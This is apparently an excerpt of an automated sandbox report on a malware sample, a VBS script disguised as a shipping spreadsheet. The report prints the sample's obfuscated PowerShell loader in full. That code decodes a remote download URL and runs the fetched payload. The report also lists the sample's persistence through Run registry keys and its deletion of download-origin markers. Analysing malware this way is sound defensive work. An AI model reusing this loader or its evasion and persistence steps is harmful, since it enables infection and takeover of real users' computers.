Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: GetDelegateForFunctionPointer((Reaffirmations $Overherrernes $Skamrider242), (Supervise @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Tritheistical = [AppDomain]::CurrentDomain.GetAsse
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Stemmesamlerens197)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($gulravage, $false).DefineType($Udplynd
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: FromBase64String($Tavlemesters)$global:Ambulatorierne = [System.Text.Encoding]::ASCII.GetString($Hjemvisning)$global:Reddedes=$Ambulatorierne.substring(290804,28156)<#Cachexias Mumiernes Kommaregler #

Suspicious powershell command line found

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Overburdeningly = 1;$Haarrddernes='Substrin';$Haarrddernes+='g';Function Blomraadne($Suggestionen){$Kulsyre=$Suggestionen.Length-$Overburdeningly;For($Esrogs=5; $Esrogs -lt $Kulsyre; $Esrogs+=(6)){$Bilendes+=$Suggestionen.$Haarrddernes.Invoke($Esrogs, $Overburdeningly);}$Bilendes;}function Uudviklet($Sammenstuvningerne){. ($Subpellucidity) ($Sammenstuvningerne);}$Dulmes=Blomraadne 'Cha,tMRanchoBlomszCenteizonkmlUfejll halaa ,ump/ epos5.udek.duske0Delet Nonad(KvindW .elgiPrecinTrossd.kkupoUdv.kwSammesvalgb MeroNFili,TTo.ea R gar1Midta0Sildd.Ingra0d.ast;Udann .ordbW Pakki Twenn .ewy6Aands4 Flor;F tal Ori,ax Syst6A.ted4In us;Moloi Henler Ragiv Tupp:Trspr1Corne2,ehir1Pyrox.Fr sk0Misoc)Torke Ekko.G KnoweAfgifcHillekHydrooS.eln/Tabul2Optje0Sylte1 er t0 klyn0Endit1Warm,0commi1Glott SubinFHaardiMicror lipoeSpi nfDoledoVegetxphyti/Bjerg1.ntif2Chilt1Supre.Medbo0Uarb, ';$subdichotomies=Blomraadne 'Fraa.U AnfrsDr,meesoegmrLokal-AlgebATid bgomd sePr ctn UnmatKalpa ';$Rugemaskine=Blomraadne 'Brillh A lht .rogtOrchepNeedlsMedik:strib/Parel/ F icdomstbrOpiliiConcevAuriceSteps.,mertgSkydeoTyskeoDer,ig,aterlMassee Mani.Imparc Sibio E.evm.rogr/LatteuGermacAtmos?Gera,e RektxCnemipSommeoFuldvrCentrtOplad=Lepadd KoldoS delwStiplnArchblFrassoantipaCathodunder&Ph soiUnbo d P.rt= k al1depoloMys.aDDyref4RevistAgricvPrissDGua adAdipoyRever2Plump-Maskir,ddanKHartvBAtticIUoplarSpiroZStri.pPlackCId tsyrec p_UnbroNS.endR Sm.aSKar oRAssis7 ThyrV erdiMVrimltAndenGSjleh_Gl.bulForetyrehee ';$kattelemmes=Blomraadne 'Trf,e>Unr,c ';$Subpellucidity=Blomraadne ' DispiEmbele Mergx enne ';$Aluminate = Blomraadne ' atrieCatarc,laedhInd.boSiph, Rustn%t.ndra.espep,alaapFals,dAnimaaan istD.liraHygie%Br.ne\Misg STaf,faNoni.lR.nsktRneres Blanp HiemoTotaloUddatnAtt,sfEkspouVe.erl .oth.UnderD toldaPanteg,ndos nejp& Mand&Amazi shareeA.delcLegalh BagloMurha For.$Parke ';Uudviklet (Blomraadne 'Syge.$ HavegHaandlGe.peo PaabbKdedea nshelForka:BrndsT,orgei absulDeltrhA inauAp degBodywgSlethe NrklnPrikkd Op.seMegal=Dread(V,melcCrescmDurwaddiffu Sickl/,rgancL rdo Kant.$KorreARingdlStnd u W,gomNon ei.redinlun.eaUnwort Brn.e baga)Brynj ');Uudviklet (Blomraadne 'O.ert$BrudegBedralNig,roNonprbbiosyaAtomil Mail:BattlLMi.iseVictua kisknA.tioeRen.rr Adve=Li sf$emnetRpastouOmf,vgHypere Jo.om nnuea Embes TalmkResmiiLing.n UvureAfled.MystisTrevlpfightlKlokkiTheomtBom,e(Bowpo$Exp.lk ladfaEmanatph not P toeSvngnl,araneHackemGibbim,andieRai ls cere)Wrath ');$Rugemaskine=$Leaner[0];Uudviklet (Blomraadne ' Trof$ PringScrewl etouoAmidobfi.eraBlgfrlTaste: lanhshrineCanonnSupersmetapiEskaddPostidPlagieR,klarRke,a=S.mmeN AucdeH.drowVagts-MervrO FilibV,rmojPejlke usikc Ins,tSepar SkyttSPhytoySldehsFasantBreake Staam udls. Su iNIs pae udaet Mahd.juncoW B steUnendb,utotC gla lIndkoiMisadeDagdrnCountt Cul. ');Uudviklet (Blomraadne ' mari$FejlbhArbejeDiffen.uppesRegnei PassdFlatmdPip.ieLunker Cyli. ,nf
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Overburdeningly = 1;$Haarrddernes='Substrin';$Haarrddernes+='g';Function Blomraadne($Suggestionen){$Kulsyre=$Suggestionen.Length-$Overburdeningly;For($Esrogs=5; $Esrogs -lt $Kulsyre; $Esrogs+=(6)){$Bilendes+=$Suggestionen.$Haarrddernes.Invoke($Esrogs, $Overburdeningly);}$Bilendes;}function Uudviklet($Sammenstuvningerne){. ($Subpellucidity) ($Sammenstuvningerne);}$Dulmes=Blomraadne 'Cha,tMRanchoBlomszCenteizonkmlUfejll halaa ,ump/ epos5.udek.duske0Delet Nonad(KvindW .elgiPrecinTrossd.kkupoUdv.kwSammesvalgb MeroNFili,TTo.ea R gar1Midta0Sildd.Ingra0d.ast;Udann .ordbW Pakki Twenn .ewy6Aands4 Flor;F tal Ori,ax Syst6A.ted4In us;Moloi Henler Ragiv Tupp:Trspr1Corne2,ehir1Pyrox.Fr sk0Misoc)Torke Ekko.G KnoweAfgifcHillekHydrooS.eln/Tabul2Optje0Sylte1 er t0 klyn0Endit1Warm,0commi1Glott SubinFHaardiMicror lipoeSpi nfDoledoVegetxphyti/Bjerg1.ntif2Chilt1Supre.Medbo0Uarb, ';$subdichotomies=Blomraadne 'Fraa.U AnfrsDr,meesoegmrLokal-AlgebATid bgomd sePr ctn UnmatKalpa ';$Rugemaskine=Blomraadne 'Brillh A lht .rogtOrchepNeedlsMedik:strib/Parel/ F icdomstbrOpiliiConcevAuriceSteps.,mertgSkydeoTyskeoDer,ig,aterlMassee Mani.Imparc Sibio E.evm.rogr/LatteuGermacAtmos?Gera,e RektxCnemipSommeoFuldvrCentrtOplad=Lepadd KoldoS delwStiplnArchblFrassoantipaCathodunder&Ph soiUnbo d P.rt= k al1depoloMys.aDDyref4RevistAgricvPrissDGua adAdipoyRever2Plump-Maskir,ddanKHartvBAtticIUoplarSpiroZStri.pPlackCId tsyrec p_UnbroNS.endR Sm.aSKar oRAssis7 ThyrV erdiMVrimltAndenGSjleh_Gl.bulForetyrehee ';$kattelemmes=Blomraadne 'Trf,e>Unr,c ';$Subpellucidity=Blomraadne ' DispiEmbele Mergx enne ';$Aluminate = Blomraadne ' atrieCatarc,laedhInd.boSiph, Rustn%t.ndra.espep,alaapFals,dAnimaaan istD.liraHygie%Br.ne\Misg STaf,faNoni.lR.nsktRneres Blanp HiemoTotaloUddatnAtt,sfEkspouVe.erl .oth.UnderD toldaPanteg,ndos nejp& Mand&Amazi shareeA.delcLegalh BagloMurha For.$Parke ';Uudviklet (Blomraadne 'Syge.$ HavegHaandlGe.peo PaabbKdedea nshelForka:BrndsT,orgei absulDeltrhA inauAp degBodywgSlethe NrklnPrikkd Op.seMegal=Dread(V,melcCrescmDurwaddiffu Sickl/,rgancL rdo Kant.$KorreARingdlStnd u W,gomNon ei.redinlun.eaUnwort Brn.e baga)Brynj ');Uudviklet (Blomraadne 'O.ert$BrudegBedralNig,roNonprbbiosyaAtomil Mail:BattlLMi.iseVictua kisknA.tioeRen.rr Adve=Li sf$emnetRpastouOmf,vgHypere Jo.om nnuea Embes TalmkResmiiLing.n UvureAfled.MystisTrevlpfightlKlokkiTheomtBom,e(Bowpo$Exp.lk ladfaEmanatph not P toeSvngnl,araneHackemGibbim,andieRai ls cere)Wrath ');$Rugemaskine=$Leaner[0];Uudviklet (Blomraadne ' Trof$ PringScrewl etouoAmidobfi.eraBlgfrlTaste: lanhshrineCanonnSupersmetapiEskaddPostidPlagieR,klarRke,a=S.mmeN AucdeH.drowVagts-MervrO FilibV,rmojPejlke usikc Ins,tSepar SkyttSPhytoySldehsFasantBreake Staam udls. Su iNIs pae udaet Mahd.juncoW B steUnendb,utotC gla lIndkoiMisadeDagdrnCountt Cul. ');Uudviklet (Blomraadne ' mari$FejlbhArbejeDiffen.uppesRegnei PassdFlatmdPip.ieLunker Cyli. ,nf
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Overburdeningly = 1;$Haarrddernes='Substrin';$Haarrddernes+='g';Function Blomraadne($Suggestionen){$Kulsyre=$Suggestionen.Length-$Overburdeningly;For($Esrogs=5; $Esrogs -lt $Kulsyre; $Esrogs+=(6)){$Bilendes+=$Suggestionen.$Haarrddernes.Invoke($Esrogs, $Overburdeningly);}$Bilendes;}function Uudviklet($Sammenstuvningerne){. ($Subpellucidity) ($Sammenstuvningerne);}$Dulmes=Blomraadne 'Cha,tMRanchoBlomszCenteizonkmlUfejll halaa ,ump/ epos5.udek.duske0Delet Nonad(KvindW .elgiPrecinTrossd.kkupoUdv.kwSammesvalgb MeroNFili,TTo.ea R gar1Midta0Sildd.Ingra0d.ast;Udann .ordbW Pakki Twenn .ewy6Aands4 Flor;F tal Ori,ax Syst6A.ted4In us;Moloi Henler Ragiv Tupp:Trspr1Corne2,ehir1Pyrox.Fr sk0Misoc)Torke Ekko.G KnoweAfgifcHillekHydrooS.eln/Tabul2Optje0Sylte1 er t0 klyn0Endit1Warm,0commi1Glott SubinFHaardiMicror lipoeSpi nfDoledoVegetxphyti/Bjerg1.ntif2Chilt1Supre.Medbo0Uarb, ';$subdichotomies=Blomraadne 'Fraa.U AnfrsDr,meesoegmrLokal-AlgebATid bgomd sePr ctn UnmatKalpa ';$Rugemaskine=Blomraadne 'Brillh A lht .rogtOrchepNeedlsMedik:strib/Parel/ F icdomstbrOpiliiConcevAuriceSteps.,mertgSkydeoTyskeoDer,ig,aterlMassee Mani.Imparc Sibio E.evm.rogr/LatteuGermacAtmos?Gera,e RektxCnemipSommeoFuldvrCentrtOplad=Lepadd KoldoS delwStiplnArchblFrassoantipaCathodunder&Ph soiUnbo d P.rt= k al1depoloMys.aDDyref4RevistAgricvPrissDGua adAdipoyRever2Plump-Maskir,ddanKHartvBAtticIUoplarSpiroZStri.pPlackCId tsyrec p_UnbroNS.endR Sm.aSKar oRAssis7 ThyrV erdiMVrimltAndenGSjleh_Gl.bulForetyrehee ';$kattelemmes=Blomraadne 'Trf,e>Unr,c ';$Subpellucidity=Blomraadne ' DispiEmbele Mergx enne ';$Aluminate = Blomraadne ' atrieCatarc,laedhInd.boSiph, Rustn%t.ndra.espep,alaapFals,dAnimaaan istD.liraHygie%Br.ne\Misg STaf,faNoni.lR.nsktRneres Blanp HiemoTotaloUddatnAtt,sfEkspouVe.erl .oth.UnderD toldaPanteg,ndos nejp& Mand&Amazi shareeA.delcLegalh BagloMurha For.$Parke ';Uudviklet (Blomraadne 'Syge.$ HavegHaandlGe.peo PaabbKdedea nshelForka:BrndsT,orgei absulDeltrhA inauAp degBodywgSlethe NrklnPrikkd Op.seMegal=Dread(V,melcCrescmDurwaddiffu Sickl/,rgancL rdo Kant.$KorreARingdlStnd u W,gomNon ei.redinlun.eaUnwort Brn.e baga)Brynj ');Uudviklet (Blomraadne 'O.ert$BrudegBedralNig,roNonprbbiosyaAtomil Mail:BattlLMi.iseVictua kisknA.tioeRen.rr Adve=Li sf$emnetRpastouOmf,vgHypere Jo.om nnuea Embes TalmkResmiiLing.n UvureAfled.MystisTrevlpfightlKlokkiTheomtBom,e(Bowpo$Exp.lk ladfaEmanatph not P toeSvngnl,araneHackemGibbim,andieRai ls cere)Wrath ');$Rugemaskine=$Leaner[0];Uudviklet (Blomraadne ' Trof$ PringScrewl etouoAmidobfi.eraBlgfrlTaste: lanhshrineCanonnSupersmetapiEskaddPostidPlagieR,klarRke,a=S.mmeN AucdeH.drowVagts-MervrO FilibV,rmojPejlke usikc Ins,tSepar SkyttSPhytoySldehsFasantBreake Staam udls. Su iNIs pae udaet Mahd.juncoW B steUnendb,utotC gla lIndkoiMisadeDagdrnCountt Cul. ');Uudviklet (Blomraadne ' mari$FejlbhArbejeDiffen.uppesRegnei PassdFlatmdPip.ieLunker Cyli. ,nf	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Overburdeningly = 1;$Haarrddernes='Substrin';$Haarrddernes+='g';Function Blomraadne($Suggestionen){$Kulsyre=$Suggestionen.Length-$Overburdeningly;For($Esrogs=5; $Esrogs -lt $Kulsyre; $Esrogs+=(6)){$Bilendes+=$Suggestionen.$Haarrddernes.Invoke($Esrogs, $Overburdeningly);}$Bilendes;}function Uudviklet($Sammenstuvningerne){. ($Subpellucidity) ($Sammenstuvningerne);}$Dulmes=Blomraadne 'Cha,tMRanchoBlomszCenteizonkmlUfejll halaa ,ump/ epos5.udek.duske0Delet Nonad(KvindW .elgiPrecinTrossd.kkupoUdv.kwSammesvalgb MeroNFili,TTo.ea R gar1Midta0Sildd.Ingra0d.ast;Udann .ordbW Pakki Twenn .ewy6Aands4 Flor;F tal Ori,ax Syst6A.ted4In us;Moloi Henler Ragiv Tupp:Trspr1Corne2,ehir1Pyrox.Fr sk0Misoc)Torke Ekko.G KnoweAfgifcHillekHydrooS.eln/Tabul2Optje0Sylte1 er t0 klyn0Endit1Warm,0commi1Glott SubinFHaardiMicror lipoeSpi nfDoledoVegetxphyti/Bjerg1.ntif2Chilt1Supre.Medbo0Uarb, ';$subdichotomies=Blomraadne 'Fraa.U AnfrsDr,meesoegmrLokal-AlgebATid bgomd sePr ctn UnmatKalpa ';$Rugemaskine=Blomraadne 'Brillh A lht .rogtOrchepNeedlsMedik:strib/Parel/ F icdomstbrOpiliiConcevAuriceSteps.,mertgSkydeoTyskeoDer,ig,aterlMassee Mani.Imparc Sibio E.evm.rogr/LatteuGermacAtmos?Gera,e RektxCnemipSommeoFuldvrCentrtOplad=Lepadd KoldoS delwStiplnArchblFrassoantipaCathodunder&Ph soiUnbo d P.rt= k al1depoloMys.aDDyref4RevistAgricvPrissDGua adAdipoyRever2Plump-Maskir,ddanKHartvBAtticIUoplarSpiroZStri.pPlackCId tsyrec p_UnbroNS.endR Sm.aSKar oRAssis7 ThyrV erdiMVrimltAndenGSjleh_Gl.bulForetyrehee ';$kattelemmes=Blomraadne 'Trf,e>Unr,c ';$Subpellucidity=Blomraadne ' DispiEmbele Mergx enne ';$Aluminate = Blomraadne ' atrieCatarc,laedhInd.boSiph, Rustn%t.ndra.espep,alaapFals,dAnimaaan istD.liraHygie%Br.ne\Misg STaf,faNoni.lR.nsktRneres Blanp HiemoTotaloUddatnAtt,sfEkspouVe.erl .oth.UnderD toldaPanteg,ndos nejp& Mand&Amazi shareeA.delcLegalh BagloMurha For.$Parke ';Uudviklet (Blomraadne 'Syge.$ HavegHaandlGe.peo PaabbKdedea nshelForka:BrndsT,orgei absulDeltrhA inauAp degBodywgSlethe NrklnPrikkd Op.seMegal=Dread(V,melcCrescmDurwaddiffu Sickl/,rgancL rdo Kant.$KorreARingdlStnd u W,gomNon ei.redinlun.eaUnwort Brn.e baga)Brynj ');Uudviklet (Blomraadne 'O.ert$BrudegBedralNig,roNonprbbiosyaAtomil Mail:BattlLMi.iseVictua kisknA.tioeRen.rr Adve=Li sf$emnetRpastouOmf,vgHypere Jo.om nnuea Embes TalmkResmiiLing.n UvureAfled.MystisTrevlpfightlKlokkiTheomtBom,e(Bowpo$Exp.lk ladfaEmanatph not P toeSvngnl,araneHackemGibbim,andieRai ls cere)Wrath ');$Rugemaskine=$Leaner[0];Uudviklet (Blomraadne ' Trof$ PringScrewl etouoAmidobfi.eraBlgfrlTaste: lanhshrineCanonnSupersmetapiEskaddPostidPlagieR,klarRke,a=S.mmeN AucdeH.drowVagts-MervrO FilibV,rmojPejlke usikc Ins,tSepar SkyttSPhytoySldehsFasantBreake Staam udls. Su iNIs pae udaet Mahd.juncoW B steUnendb,utotC gla lIndkoiMisadeDagdrnCountt Cul. ');Uudviklet (Blomraadne ' mari$FejlbhArbejeDiffen.uppesRegnei PassdFlatmdPip.ieLunker Cyli. ,nf	Jump to behavior

Binary contains a suspicious time stamp

Source: FTSKIaM.exe.11.dr

Static PE information: 0x853858FE [Sun Oct 28 18:42:06 2040 UTC]

PE file contains sections with non-standard names

Source: FTSKIaM.exe.11.dr

Static PE information: section name: .didat

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_00007FFB4B2900BD pushad ; iretd	3_2_00007FFB4B2900C1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_00A5BABC push ds; ret	9_2_00A5BABE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_070708C2 push eax; mov dword ptr [esp], ecx	9_2_07070AC4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_07070AB8 push eax; mov dword ptr [esp], ecx	9_2_07070AC4
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 11_2_022F0CB5 push edi; ret	11_2_022F0CC2
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Code function: 17_2_00A1376D push ecx; ret	17_2_00A13780
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Code function: 17_2_00A113F8 pushfd ; retf	17_2_00A113F9

Drops PE files

Source: C:\Program Files (x86)\Windows Mail\wab.exe

File created: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe

Jump to dropped file

Boot Survival

Creates multiple autostart registry keys

Source: C:\Windows\SysWOW64\reg.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Startup key			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run FTSKIaM			Jump to behavior

Source: C:\Program Files (x86)\Windows Mail\wab.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run FTSKIaM	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run FTSKIaM	Jump to behavior
Source: C:\Windows\SysWOW64\reg.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Startup key	Jump to behavior
Source: C:\Windows\SysWOW64\reg.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Startup key	Jump to behavior

Hooking and other Techniques for Hiding and Protection

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Program Files (x86)\Windows Mail\wab.exe

File opened: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe:Zone.Identifier read attributes | delete

Jump to behavior

Uses an obfuscated file name to hide its real file extension (double extension)

Source: Possible double extension: xls.vbs

Static PE information: Copy of Poseidon Marine 4th monthly Stores Apr 2024 R3 .xls.vbs

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Registry key monitored for changes: HKEY_CURRENT_USER_Classes			Jump to behavior
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Registry key monitored for changes: HKEY_CURRENT_USER_Classes			Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
